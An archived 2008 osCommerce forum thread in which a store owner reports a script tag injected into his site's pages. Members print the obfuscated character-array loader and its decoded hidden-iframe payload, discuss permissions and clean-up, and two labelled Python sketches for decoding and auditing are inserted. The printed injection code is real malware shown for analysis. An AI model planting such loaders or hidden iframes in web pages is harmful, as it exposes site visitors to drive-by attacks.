rod_c Posted August 12, 2008
Hi All. The other day I noticed that when viewing my site the web browser was saying that not all the items on the site were running through my SSL. So I had a look through index.php and found this code:
<script type='text/javascript' src='http://4ura.net/js_new.js'></script>
It had been added just before the </body> tag. I haven’t ever seen this code before and I have no idea where it came from. I also found it in other files on my site. Does anyone know what caused it and how to prevent it from happening again?
germ Posted August 12, 2008
Just for grins and giggles I downloaded the script and decoded it. I got this:
<iframe src="http://v84.org/in.ci?2" width=1 height=1 style="visibility: hidden"></iframe>
As far as I know, iframes are a way to steal information from a web page. The original script looks like this:
a=new Array('0.06e+3','10.5e+1','10.2e+1','11.4e+1','0.097e+3','0.109e+3','1.01e+2','0.32e+2','11.5e+1','0.114e+3','0.099e+3','0.61e+2','3.4e+1','10.4e+1','0.116e+3','11.6e+1','1.12e+2','0.058e+3','4.7e+1','0.47e+2','1.18e+2','0.56e+2','0.52e+2','4.6e+1','0.111e+3','1.14e+2','10.3e+1','4.7e+1','1.05e+2','0.11e+3','0.046e+3','0.099e+3','0.103e+3','10.5e+1','0.063e+3','0.5e+2','3.4e+1','0.32e+2','1.19e+2','0.105e+3','10e+1','0.116e+3','0.104e+3','0.61e+2','0.049e+3','0.32e+2','10.4e+1','0.101e+3','0.105e+3','10.3e+1','10.4e+1','1.16e+2','0.061e+3','0.49e+2','3.2e+1','1.15e+2','11.6e+1','12.1e+1','1.08e+2','10.1e+1','6.1e+1','0.34e+2','0.118e+3','1.05e+2','11.5e+1','0.105e+3','0.98e+2','1.05e+2','0.108e+3','10.5e+1','0.116e+3','0.121e+3','0.058e+3','3.2e+1','0.104e+3','1.05e+2','0.1e+3','0.1e+3','10.1e+1','1.1e+2','3.4e+1','0.62e+2','6e+1','0.47e+2','1.05e+2','1.02e+2','11.4e+1','0.97e+2','0.109e+3','0.101e+3','0.62e+2');for(var p in a){document.write(String.fromCharCode(parseFloat(a[p])));};
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help
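Added example, not part of the thread: the posted script stores each character of its payload as a float literal and emits it with document.write, so it can be decoded statically in Python without loading it in a browser. The sample input is the first twelve entries of the posted array; the "invisible iframe" heuristic and the placeholder host in the sample tag are assumptions of this sketch.

```python
import re

ARRAY_RE = re.compile(r"new\s+Array\(([^)]*)\)")   # body of each Array(...) literal
LITERAL_RE = re.compile(r"'([^']*)'")               # each quoted element
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# Assumed heuristic for "invisible": 0/1-pixel size or CSS that hides the frame.
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*['\"]?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none",
    re.I)


def decode_char_arrays(js_source):
    """Decode each Array of numeric strings into text without executing any JavaScript."""
    results = []
    for body in ARRAY_RE.findall(js_source):
        try:
            codes = [round(float(item)) for item in LITERAL_RE.findall(body)]
            if codes:
                results.append("".join(chr(code) for code in codes))
        except (ValueError, OverflowError):
            continue  # not an array of character codes; skip it
    return results


def hidden_iframes(html):
    """Return the <iframe> opening tags that the heuristic considers invisible."""
    return [tag for tag in IFRAME_RE.findall(html) if HIDDEN_RE.search(tag)]


# First twelve entries of the array posted above; the full array decodes the same way.
SAMPLE_JS = ("a=new Array('0.06e+3','10.5e+1','10.2e+1','11.4e+1','0.097e+3','0.109e+3',"
             "'1.01e+2','0.32e+2','11.5e+1','0.114e+3','0.099e+3','0.61e+2');")
# Constructed tag with the same attributes as the decoded one; the host is a placeholder.
SAMPLE_TAG = ('<iframe src="http://tracker.example/in" width=1 height=1 '
              'style="visibility: hidden"></iframe>')

if __name__ == "__main__":
    print(decode_char_arrays(SAMPLE_JS))
    print(hidden_iframes(SAMPLE_TAG))
```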
germ Posted August 12, 2008
How to prevent it?
Check ALL your files and remove the offending code.
Check for files "planted" on your site (files you didn't create or put there).
Change ALL your passwords (FTP, Cpanel, .htaccess, osC admin).
Check all your permissions: Folders should be 755, Files should be 644
And if you install this contribution: Site Monitor
It will warn you if files get altered again. I may have left something out. If anyone else has anything to add, post away!
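Added example, not from the thread or from any contribution it mentions: a Python sketch of the file and permission checks in the list above, meant to be run against the site tree on the server, since an FTP copy to a PC does not keep the permission bits. It reports folders looser than 755, files looser than 644, and script tags that load from a host other than the store's own; the host names and the sample tree are constructed.

```python
import os
import re
import stat
import tempfile

# <script ... src="http(s)://host/..."> ; captures the host the script loads from.
SCRIPT_SRC = re.compile(r"<script[^>]+src=['\"]https?://([^/'\"]+)", re.I)
MAX_MODE = {True: 0o755, False: 0o644}  # folders 755, files 644, as advised in the thread


def audit(root, own_host):
    """Return sorted (relative_path, problem) pairs for the tree under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # skip symlinks; their own mode bits carry no meaning
            rel = os.path.relpath(path, root)
            is_dir = stat.S_ISDIR(st.st_mode)
            mode = stat.S_IMODE(st.st_mode)
            if mode & ~MAX_MODE[is_dir]:
                findings.append((rel, "mode %o, expected at most %o" % (mode, MAX_MODE[is_dir])))
            if stat.S_ISREG(st.st_mode):
                with open(path, "r", errors="replace") as fh:
                    for host in SCRIPT_SRC.findall(fh.read()):
                        if host.lower() != own_host.lower():
                            findings.append((rel, "off-site script from " + host))
    return sorted(findings)


def demo():
    """Constructed tree: a clean page, an injected page and a 777 images folder."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "images"))
        os.chmod(os.path.join(root, "images"), 0o777)
        pages = {
            "clean.php": "<html><body>ok</body></html>",
            "index.php": "<body>shop<script type='text/javascript' "
                         "src='http://injected.example/x.js'></script></body>",
        }
        for name, body in pages.items():
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write(body)
            os.chmod(path, 0o644)
        return audit(root, "shop.example")


if __name__ == "__main__":
    for rel, problem in demo():
        print(rel, "-", problem)
```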
rod_c (Author) Posted August 12, 2008
The only thing I can think of that could have caused this is the last addon I installed, "UltraPics_2_08.zip". Has anyone else had a problem with this addon??
germ Posted August 12, 2008
If you have a permissions problem it could be that some wandering hacking bot finally found your site and bit you. I had a permissions problem and the site was online for about 11 months before a different, less insidious, bot got to me. :blush:
rod_c (Author) Posted August 12, 2008
I have just been through all my files and folders and they seem to be set correctly. Is there any easier way to check the files than doing it manually through my host's control panel and checking every file individually? I think I checked them all but I don’t know, I could have missed something.
EDIT: Some of the files that were edited were in my admin section that was protected with a .htaccess file. How would it have got past that?
germ Posted August 12, 2008
If you FTP all your files to your PC, ways to search for text are discussed here: Click Me
I had a folder in the admin hacked and it was protected by .htaccess, too. Mine was a permissions problem. Yours could be something else entirely. Hard to say really. It might not even be anything on your site. If the server was hacked there's nothing you can do about that. You should probably report this to your host.
rod_c (Author) Posted August 12, 2008
Thanks Jim, I already scanned all the files for the code and removed it. But what I meant in my last post was: is there an easy way to check your permissions? I have also opened a support ticket with my host and I'm waiting for a reply.
germ Posted August 12, 2008
Someone just made a contribution for that: Click Me
I haven't tried it, so I don't know how well it does/doesn't work.
rod_c (Author) Posted August 12, 2008
I installed that contribution to show you all the file and folder permissions and it works great. A quick couple of questions though:
1. That contribution has a lot of the files to be set to 755 but mine are already set to 644. Should I leave them at 644?
2. Some of the folders on my site were set to 777. Could this have been the cause of my infection?
EDIT: 3. Is it likely that there's a file on my site that will reinfect my site? If so, how do I find it?
rod_c (Author) Posted August 12, 2008
Actually some of the folders like catalog/images/ are meant to be set to 777: http://www.oscommerce.info/kb/osCommerce/I...nd_Upgrades/224
Is that a security risk??
Guest Posted August 12, 2008
yes. any folder at 777 allows the world to write to that folder. i've seen a lot of "i was hacked" topics mention /images/ is chmodded to 777. set it to 755.
777 = read, write & execute permissions to everyone
755 = read, execute to everyone and write permissions to the owner
FIMBLE Posted August 12, 2008
Worth pointing out that some hosts will not allow you to upload images etc. at 755 and you need to have 777 in order for the store to work. It's worth checking your hosts to see if this is you, and if it is ask them to sort this out. If they say it cannot be done, change hosts to someone who will.
Regards
Nic
Sometimes you're the dog and sometimes the lamp post
My Contributions
rod_c (Author) Posted August 12, 2008
Thanks everyone for your input, I'm just waiting on my host to let me know if they will allow me to upload images with the 755 permissions. Although it's most likely that the problem occurred from incorrect permissions, is it possible that it was caused by one of the contributions I have added to my site? (All contributions were found on this site and had been around for a while.)
FIMBLE Posted August 12, 2008
Anything is possible, which ones have you got? I think that it is more than likely that they got in through the images folders. Try searching for some security contributions:
IP Trap
Site Monitor
Cross site scripting
None of them are the ultimate answer, just extra security. Combined they can be useful.
Nic
germ Posted August 12, 2008
You can have your images folder at 755 and still upload images if you install a contribution called osC File Browser. The way it works is you use FTP or Cpanel or whatever to upload images beforehand. Then in your Admin a box pops up and you just pick the image when creating/editing categories and products. There are several requirements to be able to use this mod so check that out before you try to install.
And just an FYI, NEVER EVER have a web accessible folder set to 777 permissions. If you do it's not a question of IF you get hacked, it's just WHEN.
alternative pope Posted August 12, 2008
I've thought my site was hacked & it prob has been due 2 lack of experience, but whenever my host 123ehost fixed a problem for me (I always tried to sort it out myself, & sometimes I did). But my host didn't mention anything about it being hacked or not even tho I asked them more than once. Are they hiding something? Is this common?
One last question & maybe something 2 ponder over, & I'M NOT NAMING NAMES OR ACCUSING ANY MEMBERS ON THIS FORUM cause I really don't hav any suspicions about specific members but it will bug if I don't ask this question; How likely is it that some forum members on here r targeting newbies like myself & hacking their sites (for purposes unknown 2 me)? I've only just thought about it. Hope these questions help in sum way, LOL! :rolleyes:
FIMBLE Posted August 12, 2008
Anything is possible but I would say it's not likely. I can't think of anyone who would want to direct their energy this way.
Nic
Guest Posted August 12, 2008
> I've thought my site was hacked & it prob has been due 2 lack of experience, but whenever my host 123ehost fixed a problem for me (I always tried to sort it out myself, & sometimes I did). But my host didn't mention anything about it being hacked or not even tho I asked them more than once. Are they hiding something? Is this common? One last question & maybe something 2 ponder over, & I'M NOT NAMING NAMES OR ACCUSING ANY MEMBERS ON THIS FORUM cause I really don't hav any suspicions about specific members but it will bug if I don't ask this question; How likely is it that some forum members on here r targeting newbies like myself & hacking their sites (for purposes unknown 2 me)? I've only just thought about it. Hope these questions help in sum way, LOL! :rolleyes:
If you think that is happening, don't use the forum, remove all identifying info from your profile, and see if the condition persists.
germ Posted August 12, 2008
> I've thought my site was hacked & it prob has been due 2 lack of experience, but whenever my host 123ehost fixed a problem for me (I always tried to sort it out myself, & sometimes I did). But my host didn't mention anything about it being hacked or not even tho I asked them more than once. Are they hiding something? Is this common? One last question & maybe something 2 ponder over, & I'M NOT NAMING NAMES OR ACCUSING ANY MEMBERS ON THIS FORUM cause I really don't hav any suspicions about specific members but it will bug if I don't ask this question; How likely is it that some forum members on here r targeting newbies like myself & hacking their sites (for purposes unknown 2 me)? I've only just thought about it. Hope these questions help in sum way, LOL! :rolleyes:
If you don't trust the people here, you know where the door is. Don't let it hit you on the gluteus maximus on the way out. <_<
rod_c (Author) Posted August 12, 2008
Ok, the add-ons I have installed are:
http://addons.oscommerce.com/info/1642 - UltraPics 2.08
http://addons.oscommerce.com/info/6014 - eWAY XML Payment Module
http://addons.oscommerce.com/info/2138 - Full Order IP Recorder 1.6
http://addons.oscommerce.com/info/1435 - Order Editor 5.0.6.3
http://addons.oscommerce.com/info/6051 - Product Listing Enhancements, Thumbnails & Manufacturer Headings V1.6
http://addons.oscommerce.com/info/2458 - Shipping Zones - rest of the world add-on
http://addons.oscommerce.com/info/934 - NewsDesk
http://addons.oscommerce.com/info/824 - Who's Online Enhancement
http://addons.oscommerce.com/info/1026 - Information Pages Unlimited v1.0
http://addons.oscommerce.com/info/6134 - Check Permissions 1.1
So Jim, are you saying that I won't be able to upload images in the add product page with 755?? And I will definitely need the "osC File Browser"? Or is there still a chance that I might be able to upload like normal with 755?
Also some of the PHP files are currently set to 644, should I change them to 755?? The "Check Permissions" add-on is saying they should be set to 755. Just wondering what everyone else has them set to.
germ Posted August 12, 2008
You'd only have to check into installing osC File Browser if in your Admin you get the "Image directory is not writable" error after changing the images folder permissions to 755. If you don't see the error, you're OK. Like I said, there are a few requirements listed in the install directions so read them before attempting an install.
I disagree with the "Check Permissions" add-on. I say PHP files should be 644. On most servers they'd probably work either way (truth be known).
rod_c (Author) Posted August 13, 2008
OK, I installed the SiteMonitor add-on, but like some other people I get an error because the file it needs to create can’t be created, because I would need to set the folder permissions to 777, which after all our discussion on the subject seems like a pretty dumb thing to do. Does anyone else have any addons for security? I would have liked to use the SiteMonitor one but can't.
Guest Posted August 13, 2008
sitemonitor works perfectly fine on 755. if it doesn't work, your host has a shoddy and insecure setup. going on your last post, you can't work using 755?
rod_c (Author) Posted August 13, 2008
Ok, if I need to change hosts I don't want to encounter the same problem again, so can some of you guys please let me know who you are with so I can make sure it will work if I move?
Archived
This topic is now archived and is closed to further replies.